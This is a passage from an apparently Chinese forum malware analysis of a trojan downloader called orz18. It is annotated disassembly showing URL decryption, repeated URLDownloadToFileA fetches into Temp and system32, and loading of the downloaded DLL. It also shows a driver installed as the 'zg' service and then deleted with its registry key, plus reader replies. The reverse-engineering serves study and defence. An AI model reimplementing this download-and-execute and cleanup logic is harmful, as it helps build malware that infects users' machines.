004160BF |.56 push esi ; |OutBufferSize => 0
004160C0 |.56 push esi ; |OutBuffer => NULL
004160C1 |.68 00320000 push 3200 ; |InBufferSize = 3200 (12800.)
004160C6 |.68 A4014100 push orz18.004101A4 ; |InBuffer = orz18.004101A4
004160CB |.68 1C002200 push 22001C ; |IoControlCode = 22001C
004160D0 |.57 push edi ; |hDevice
004160D1 |.FF15 68104000call dword ptr ds: ; \DeviceIoControl
004160D7 |>57 push edi ; /hObject
004160D8 |.FF15 AC104000call dword ptr ds: ; \CloseHandle
004160DE |.5F pop edi
004160DF |.33C0 xor eax,eax
004160E1 |.5E pop esi
004160E2 |.C9 leave
004160E3 \.C3 retn
}
21 线程函数 生成随机的 DLL 文件 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5dc2de.dll
call orz18.00414920 下载地址被解密
00416070 |.68 30574100 push orz18.00415730 ; |ThreadFunction = orz18.00415730
{
00415730 /.55 push ebp
00415731 |.8BEC mov ebp,esp
00415733 |.81EC 04010000sub esp,104
00415739 |.8D85 FCFEFFFFlea eax,dword ptr ss:
0041573F |.56 push esi
00415740 |.50 push eax ; /Buffer
00415741 |.68 04010000 push 104 ; |BufSize = 104 (260.)
00415746 |.FF15 2C104000call dword ptr ds: ; \GetTempPathA
0041574C |.FF15 28104000call dword ptr ds: ; [GetTickCount
00415752 |.50 push eax ; /<%x>
00415753 |.8D85 FCFEFFFFlea eax,dword ptr ss: ; |
00415759 |.50 push eax ; |<%s>
0041575A |.BE 3C634100 mov esi,orz18.0041633C ; |
0041575F |.68 38434100 push orz18.00414338 ; |Format = "%s%x.dll"
00415764 |.56 push esi ; |s => orz18.0041633C
00415765 |.FF15 10114000call dword ptr ds: ; \wsprintfA
0041576B |.56 push esi
0041576C |.E8 A3ECFFFF call orz18.00414414
00415771 |.83C4 14 add esp,14
00415774 |.84C0 test al,al
00415776 |.75 07 jnz short orz18.0041577F
00415778 |.33C0 xor eax,eax
0041577A |.E9 B0000000 jmp orz18.0041582F
0041577F |>53 push ebx
00415780 |.57 push edi
00415781 |.68 08404100 push orz18.00414008
00415786 |.E8 95F1FFFF call orz18.00414920
0041578B |.C70424 A43F410>mov dword ptr ss:,orz18.0041>
00415792 |.E8 89F1FFFF call orz18.00414920 //下载地址被解密
00415797 |.E8 B4F9FFFF call orz18.00415150 //下载木马
0041579C |.8B35 88104000mov esi,dword ptr ds: ; |kernel32.Sleep
004157A2 |.C70424 50C3000>mov dword ptr ss:,0C350 ; |
004157A9 |.FFD6 call esi ; \Sleep
004157AB |.68 78404100 push orz18.00414078
004157B0 |.E8 6BF1FFFF call orz18.00414920
004157B5 |.59 pop ecx
004157B6 |.E8 95FDFFFF call orz18.00415550
004157BB |.E8 4DF3FFFF call orz18.00414B0D
004157C0 |.BF F4010000 mov edi,1F4
004157C5 |.57 push edi ; /Timeout => 500. ms
004157C6 |.FFD6 call esi ; \Sleep
004157C8 |.33DB xor ebx,ebx
004157CA |.53 push ebx ; /pThreadId => NULL
004157CB |.53 push ebx ; |CreationFlags => 0
004157CC |.53 push ebx ; |pThreadParm => NULL
004157CD |.68 B3554100 push orz18.004155B3 ; |ThreadFunction = orz18.004155B3
004157D2 |.53 push ebx ; |StackSize => 0
004157D3 |.53 push ebx ; |pSecurity => NULL
004157D4 |.FF15 34104000call dword ptr ds: ; \CreateThread
004157DA |.57 push edi ; /Timeout => 500. ms
004157DB |.FFD6 call esi ; \Sleep
004157DD |.A1 48414100 mov eax,dword ptr ds:
004157E2 |.3D 0F270000 cmp eax,270F
004157E7 |.7D 18 jge short orz18.00415801
004157E9 |.33FF xor edi,edi
004157EB |.3BC3 cmp eax,ebx
004157ED |.7E 1F jle short orz18.0041580E
004157EF |>68 60EA0000 /push 0EA60
004157F4 |.FFD6 |call esi
004157F6 |.47 |inc edi
004157F7 |.3B3D 48414100|cmp edi,dword ptr ds:
004157FD |.^ 7C F0 \jl short orz18.004157EF
004157FF |.EB 0D jmp short orz18.0041580E
00415801 |>6A 1E push 1E
00415803 |.5F pop edi
00415804 |>68 60EA0000 /push 0EA60
00415809 |.FFD6 |call esi
0041580B |.4F |dec edi
0041580C |.^ 75 F6 \jnz short orz18.00415804
0041580E |>BE 4C414100 mov esi,orz18.0041414C
00415813 |.56 push esi
00415814 |.E8 97F1FFFF call orz18.004149B0
00415819 |.C70424 F842410>mov dword ptr ss:,orz18.0041>;ASCII "aaa"
00415820 |.6A 42 push 42
00415822 |.56 push esi
00415823 |.E8 18F3FFFF call orz18.00414B40
00415828 |.83C4 0C add esp,0C
0041582B |.33C0 xor eax,eax
0041582D |.5F pop edi
0041582E |.5B pop ebx
0041582F |>5E pop esi
00415830 |.C9 leave
00415831 \.C2 0400 retn 4
}
22 把txt文件下载到C:\windows\system32\ 名字 asdfasdf
{
00414B40 /$55 push ebp
00414B41 |.8BEC mov ebp,esp
00414B43 |.81EC 0C020000sub esp,20C
00414B49 |.53 push ebx
00414B4A |.56 push esi
00414B4B |.57 push edi
00414B4C |.6A 2E push 2E ; /c = 2E('.')
00414B4E |.FF75 08 push dword ptr ss: ; |s
00414B51 |.E8 BE170000 call orz18.00416314 ; \strrchr
00414B56 |.8B35 24114000mov esi,dword ptr ds: ;USER32.MessageBoxA
00414B5C |.59 pop ecx
00414B5D |.59 pop ecx
00414B5E |.33DB xor ebx,ebx
00414B60 |.53 push ebx ; /Style => MB_OK|MB_APPLMODAL
00414B61 |.68 10424100 push orz18.00414210 ; |Title = "pppppppp"
00414B66 |.68 04424100 push orz18.00414204 ; |Text = "iiiiiooooo"
00414B6B |.6A FA push -6 ; |hOwner = FFFFFFFA
00414B6D |.8945 FC mov dword ptr ss:,eax ; |
00414B70 |.FFD6 call esi ; \MessageBoxA
00414B72 |.395D FC cmp dword ptr ss:,ebx
00414B75 |.0F84 A2010000je orz18.00414D1D
00414B7B |.8B7D 10 mov edi,dword ptr ss:
00414B7E |.FF45 FC inc dword ptr ss:
00414B81 |.83C9 FF or ecx,FFFFFFFF
00414B84 |.33C0 xor eax,eax
00414B86 |.F2:AE repne scas byte ptr es:
00414B88 |.F7D1 not ecx
00414B8A |.49 dec ecx
00414B8B |.83F9 04 cmp ecx,4
00414B8E |.76 34 jbe short orz18.00414BC4
00414B90 |.33F6 xor esi,esi
00414B92 |>53 /push ebx
00414B93 |.53 |push ebx
00414B94 |.FF75 10 |push dword ptr ss:
00414B97 |.FF75 08 |push dword ptr ss:
00414B9A |.53 |push ebx
00414B9B |.FF15 50654100|call dword ptr ds: ;urlmon.URLDownloadToFileA
00414BA1 |.3BC3 |cmp eax,ebx
00414BA3 |.A3 40644100 |mov dword ptr ds:,eax
00414BA8 |.0F84 6F010000|je orz18.00414D1D
00414BAE |.68 88130000 |push 1388 ; /Timeout = 5000. ms
00414BB3 |.FF15 88104000|call dword ptr ds: ; \Sleep
00414BB9 |.46 |inc esi
00414BBA |.83FE 64 |cmp esi,64
00414BBD |.^ 72 D3 \jb short orz18.00414B92
00414BBF |.E9 59010000 jmp orz18.00414D1D
00414BC4 |>68 B0424100 push orz18.004142B0 ; /s2 = "ini"
00414BC9 |.FF75 FC push dword ptr ss: ; |s1
00414BCC |.E8 5F170000 call orz18.00416330 ; \_stricmp
00414BD1 |.59 pop ecx
00414BD2 |.85C0 test eax,eax
00414BD4 |.59 pop ecx
00414BD5 |.74 17 je short orz18.00414BEE
00414BD7 |.68 AC424100 push orz18.004142AC ; /s2 = "txt"
00414BDC |.FF75 FC push dword ptr ss: ; |s1
00414BDF |.E8 4C170000 call orz18.00416330 ; \_stricmp
00414BE4 |.59 pop ecx
00414BE5 |.85C0 test eax,eax
00414BE7 |.59 pop ecx
00414BE8 |.0F85 A1000000jnz orz18.00414C8F
00414BEE |>8D85 F4FDFFFFlea eax,dword ptr ss:
00414BF4 |.68 04010000 push 104 ; /BufSize = 104 (260.)
00414BF9 |.50 push eax ; |Buffer
00414BFA |.FF15 30104000call dword ptr ds: ; \GetSystemDirectoryA
00414C00 |.BF A0424100 mov edi,orz18.004142A0 ;ASCII "\asdfasdf"
00414C05 |.83C9 FF or ecx,FFFFFFFF
00414C08 |.33C0 xor eax,eax
00414C0A |.8D95 F4FDFFFFlea edx,dword ptr ss:
00414C10 |.F2:AE repne scas byte ptr es:
00414C12 |.F7D1 not ecx
00414C14 |.2BF9 sub edi,ecx
00414C16 |.8BF7 mov esi,edi
00414C18 |.8BFA mov edi,edx
00414C1A |.8BD1 mov edx,ecx
00414C1C |.83C9 FF or ecx,FFFFFFFF
00414C1F |.F2:AE repne scas byte ptr es:
00414C21 |.8BCA mov ecx,edx
00414C23 |.4F dec edi
00414C24 |.C1E9 02 shr ecx,2
00414C27 |.F3:A5 rep movs dword ptr es:,dword>
00414C29 |.8BCA mov ecx,edx
00414C2B |.8D95 F8FEFFFFlea edx,dword ptr ss:
00414C31 |.83E1 03 and ecx,3
00414C34 |.F3:A4 rep movs byte ptr es:,byte p>
00414C36 |.8DBD F4FDFFFFlea edi,dword ptr ss:
00414C3C |.83C9 FF or ecx,FFFFFFFF
00414C3F |.F2:AE repne scas byte ptr es:
00414C41 |.F7D1 not ecx
00414C43 |.2BF9 sub edi,ecx
00414C45 |.8BC1 mov eax,ecx
00414C47 |.8BF7 mov esi,edi
00414C49 |.8BFA mov edi,edx
00414C4B |.C1E9 02 shr ecx,2
00414C4E |.F3:A5 rep movs dword ptr es:,dword>
00414C50 |.8BC8 mov ecx,eax
00414C52 |.83E1 03 and ecx,3
00414C55 |.F3:A4 rep movs byte ptr es:,byte p>
00414C57 |.33F6 xor esi,esi
00414C59 |>53 /push ebx
00414C5A |.8D85 F8FEFFFF|lea eax,dword ptr ss:
00414C60 |.53 |push ebx
00414C61 |.50 |push eax ;C:\windows\system32\asdfasdf
00414C62 |.FF75 08 |push dword ptr ss:
00414C65 |.53 |push ebx
00414C66 |.FF15 50654100|call dword ptr ds: ;urlmon.URLDownloadToFileA
00414C6C |.3BC3 |cmp eax,ebx
00414C6E |.A3 40644100 |mov dword ptr ds:,eax
00414C73 |.0F84 A4000000|je orz18.00414D1D
00414C79 |.68 E02E0000 |push 2EE0 ; /Timeout = 12000. ms
00414C7E |.FF15 88104000|call dword ptr ds: ; \Sleep
00414C84 |.46 |inc esi
00414C85 |.83FE 64 |cmp esi,64
00414C88 |.^ 72 CF \jb short orz18.00414C59
00414C8A |.E9 8E000000 jmp orz18.00414D1D
00414C8F |>8D85 F4FDFFFFlea eax,dword ptr ss:
00414C95 |.50 push eax ; /Buffer
00414C96 |.68 04010000 push 104 ; |BufSize = 104 (260.)
00414C9B |.FF15 2C104000call dword ptr ds: ; \GetTempPathA
00414CA1 |.FF15 28104000call dword ptr ds: ; [GetTickCount
00414CA7 |.0345 0C add eax,dword ptr ss:
00414CAA |.50 push eax ; /<%d>
00414CAB |.8D85 F4FDFFFFlea eax,dword ptr ss: ; |
00414CB1 |.50 push eax ; |<%s>
00414CB2 |.8D85 F8FEFFFFlea eax,dword ptr ss: ; |
00414CB8 |.68 98424100 push orz18.00414298 ; |Format = "%s%d"
00414CBD |.50 push eax ; |s
00414CBE |.FF15 10114000call dword ptr ds: ; \wsprintfA
00414CC4 |.83C4 10 add esp,10
00414CC7 |.8D85 F8FEFFFFlea eax,dword ptr ss:
00414CCD |.53 push ebx
00414CCE |.50 push eax
00414CCF |.FF75 08 push dword ptr ss:
00414CD2 |.6A F8 push -8
00414CD4 |.FFD6 call esi
00414CD6 |.33F6 xor esi,esi
00414CD8 |>53 /push ebx
00414CD9 |.8D85 F8FEFFFF|lea eax,dword ptr ss:
00414CDF |.53 |push ebx
00414CE0 |.50 |push eax
00414CE1 |.FF75 08 |push dword ptr ss:
00414CE4 |.53 |push ebx
00414CE5 |.FF15 50654100|call dword ptr ds: ;urlmon.URLDownloadToFileA
00414CEB |.3BC3 |cmp eax,ebx
00414CED |.A3 40644100 |mov dword ptr ds:,eax
00414CF2 |.74 11 |je short orz18.00414D05
00414CF4 |.68 E8030000 |push 3E8 ; /Timeout = 1000. ms
00414CF9 |.FF15 88104000|call dword ptr ds: ; \Sleep
00414CFF |.46 |inc esi
00414D00 |.83FE 1E |cmp esi,1E
00414D03 |.^ 72 D3 \jb short orz18.00414CD8
00414D05 |>83FE 1E cmp esi,1E
00414D08 |.74 13 je short orz18.00414D1D
00414D0A |.8D85 F8FEFFFFlea eax,dword ptr ss:
00414D10 |.50 push eax
00414D11 |.68 3C634100 push orz18.0041633C ;ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5dc2de.dll"
00414D16 |.E8 15FDFFFF call orz18.00414A30 //运行下栽程序
00414D1B |.59 pop ecx
00414D1C |.59 pop ecx
00414D1D |>5F pop edi
00414D1E |.5E pop esi
00414D1F |.5B pop ebx
00414D20 |.C9 leave
00414D21 \.C3 retn
}
23 下载过程
{
00414A31 FF7424 08 push dword ptr ss:
00414A35 FF15 80104000 call dword ptr ds: ; kernel32.LoadLibraryA
00414A3B 8BF0 mov esi,eax
00414A3D 85F6 test esi,esi
00414A3F 74 1E je short orz18.00414A5F
00414A41 68 88424100 push orz18.00414288 ; ASCII "Winext"//下载函数
00414A46 56 push esi
00414A47 FF15 84104000 call dword ptr ds: ; kernel32.GetProcAddress
00414A4D 85C0 test eax,eax
}
24
{
00416235 |.56 push esi ; /pThreadId
00416236 |.56 push esi ; |CreationFlags
00416237 |.56 push esi ; |pThreadParm
00416238 |.68 61444100 push orz18.00414461 ; |ThreadFunction = orz18.00414461
0041623D |.56 push esi ; |StackSize
0041623E |.56 push esi ; |pSecurity
0041623F |.FF15 34104000call dword ptr ds: ; \CreateThread
00416245 |.53 push ebx
00416246 |.FFD7 call edi / /结束进程 thunder5.exe cmd.exe
00416248 |.E8 E2FDFFFF call orz18.0041602F
}
00416248 |.E8 E2FDFFFF call orz18.0041602F
{
25
0041602F /$55 push ebp
00416030 |.8BEC mov ebp,esp
00416032 |.81EC 08010000sub esp,108
00416038 |.56 push esi
00416039 |.57 push edi
0041603A |.8D85 F8FEFFFFlea eax,dword ptr ss:
00416040 |.68 04010000 push 104 ; /BufSize = 104 (260.)
00416045 |.33F6 xor esi,esi ; |
00416047 |.50 push eax ; |PathBuffer
00416048 |.56 push esi ; |hModule => NULL
00416049 |.FF15 6C104000call dword ptr ds: ; \GetModuleFileNameA
0041604F |.68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
00416054 |.FF15 88104000call dword ptr ds: ; \Sleep
0041605A |.56 push esi ; /Style => MB_OK|MB_APPLMODAL
0041605B |.68 58664100 push orz18.00416658 ; |Title = ""
00416060 |.68 DC434100 push orz18.004143DC ; |Text = "..."
00416065 |.6A FF push -1 ; |hOwner = FFFFFFFF
00416067 |.FF15 24114000call dword ptr ds: ; \MessageBoxA
0041606D |.56 push esi ; /pThreadId => NULL
0041606E |.56 push esi ; |CreationFlags => 0
0041606F |.56 push esi ; |pThreadParm => NULL
00416070 |.68 30574100 push orz18.00415730 ; |ThreadFunction = orz18.00415730
00416075 |.56 push esi ; |StackSize => 0
00416076 |.56 push esi ; |pSecurity => NULL
00416077 |.FF15 34104000call dword ptr ds: ; \CreateThread
0041607D |.6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
0041607F |.8D85 F8FEFFFFlea eax,dword ptr ss: ; |
00416085 |.56 push esi ; |NewName => NULL
00416086 |.50 push eax ; |ExistingName
00416087 |.FF15 50104000call dword ptr ds: ; \MoveFileExA
0041608D |.E8 DEFAFFFF call orz18.00415B70
00416092 |.68 48644100 push orz18.00416448 ;ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1696"
00416097 |.E8 34FFFFFF call orz18.00415FD0
0041609C |.59 pop ecx
0041609D |.56 push esi ; /hTemplateFile => NULL
0041609E |.56 push esi ; |Attributes => 0
0041609F |.6A 03 push 3 ; |Mode = OPEN_EXISTING
004160A1 |.56 push esi ; |pSecurity => NULL
004160A2 |.56 push esi ; |ShareMode => 0
004160A3 |.68 00000080 push 80000000 ; |Access = GENERIC_READ
004160A8 |.68 CC434100 push orz18.004143CC ; |FileName = "\\.\safebreas"
004160AD |.FF15 A0104000call dword ptr ds: ; \CreateFileA 访问 \\.\safebreas" 设备,该设备由 1696 驱动产生
004160B3 |.8BF8 mov edi,eax
004160B5 |.83FF FF cmp edi,-1
004160B8 |.74 1D je short orz18.004160D7
004160BA |.8D45 FC lea eax,dword ptr ss:
004160BD |.56 push esi ; /pOverlapped => NULL
004160BE |.50 push eax ; |pBytesReturned
004160BF |.56 push esi ; |OutBufferSize => 0
004160C0 |.56 push esi ; |OutBuffer => NULL
004160C1 |.68 00320000 push 3200 ; |InBufferSize = 3200 (12800.)
004160C6 |.68 A4014100 push orz18.004101A4 ; |InBuffer = orz18.004101A4
004160CB |.68 1C002200 push 22001C ; |IoControlCode = 22001C
004160D0 |.57 push edi ; |hDevice
004160D1 |.FF15 68104000call dword ptr ds: ; \DeviceIoControl
004160D7 |>57 push edi ; /hObject
004160D8 |.FF15 AC104000call dword ptr ds: ; \CloseHandle
004160DE |.5F pop edi
004160DF |.33C0 xor eax,eax
004160E1 |.5E pop esi
004160E2 |.C9 leave
004160E3 \.C3 retn
}
26 尝试打开 zg 服务,如果失败,则新建一个叫 zg 的服务,指向创建的 1696 文件。并启动该服务
启动完成以后,立即删除该 1696 文件,并使用 SHDeleteKey 完全删除注册表项目:"SYSTEM\CurrentControlSet\Services\zg
{
00415FD0 /$55 push ebp
00415FD1 |.8BEC mov ebp,esp
00415FD3 |.83EC 1C sub esp,1C
00415FD6 |.56 push esi
00415FD7 |.FF75 08 push dword ptr ss:
00415FDA |.68 C8434100 push orz18.004143C8 ;ASCII "zg"
00415FDF |.E8 44FCFFFF call orz18.00415C28
00415FE4 |.8BF0 mov esi,eax
00415FE6 |.59 pop ecx
00415FE7 |.85F6 test esi,esi
00415FE9 |.59 pop ecx
00415FEA |.74 27 je short orz18.00416013
00415FEC |.8D45 E4 lea eax,dword ptr ss:
00415FEF |.50 push eax
00415FF0 |.56 push esi
00415FF1 |.FF15 08104000call dword ptr ds: ;ADVAPI32.QueryServiceStatus
00415FF7 |.85C0 test eax,eax
00415FF9 |.74 06 je short orz18.00416001
00415FFB |.837D E8 04 cmp dword ptr ss:,4
00415FFF |.74 0B je short orz18.0041600C
00416001 |>6A 00 push 0
00416003 |.6A 00 push 0
00416005 |.56 push esi
00416006 |.FF15 04104000call dword ptr ds: ;ADVAPI32.StartServiceA
0041600C |>56 push esi
0041600D |.FF15 18104000call dword ptr ds: ;ADVAPI32.CloseServiceHandle
00416013 |>FF75 08 push dword ptr ss: ; /FileName
00416016 |.FF15 7C104000call dword ptr ds: ; \DeleteFileA
0041601C |.68 A0434100 push orz18.004143A0 ; /SubKey = "SYSTEM\CurrentControlSet\Services\zg"
00416021 |.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00416026 |.FF15 E8104000call dword ptr ds: ; \SHDeleteKeyA
0041602C |.5E pop esi
0041602D |.C9 leave
0041602E \.C3 retn
}
数据还原
{
00414988 |. /74 1F je short orz18.004149A9
0041498A |> |8A0C32 /mov cl,byte ptr ds:
0041498D |. |8AC2 |mov al,dl
0041498F |. |2C 3B |sub al,3B
00414991 |. |8BFE |mov edi,esi
00414993 |. |D0E0 |shl al,1
00414995 |. |02C8 |add cl,al
00414997 |. |33C0 |xor eax,eax
00414999 |. |880C32 |mov byte ptr ds:,cl
0041499C |. |83C9 FF |or ecx,FFFFFFFF
0041499F |. |42 |inc edx
004149A0 |. |F2:AE |repne scas byte ptr es:
004149A2 |. |F7D1 |not ecx
004149A4 |. |49 |dec ecx
004149A5 |. |3BD1 |cmp edx,ecx
004149A7 |.^|72 E1 \jb short orz18.0041498A
}
新手请体谅 完全不懂
没有试炼品么 :)我也是看不懂,膜拜 作者提供的网盘里有木马试炼~ 学习实践,外加顶帖 :funk:
膜拜啊!!!
还有这个病毒居然加了模拟点击……
汗哒哒 眼睛一直花起的,看起脑壳痛 这个就是传说中的猫癣3代啊~~ 要是能来点释放出来的SYS分析就好了:) 学习了一派内好帖子,就是看不懂啊!!!
页:
[1]
2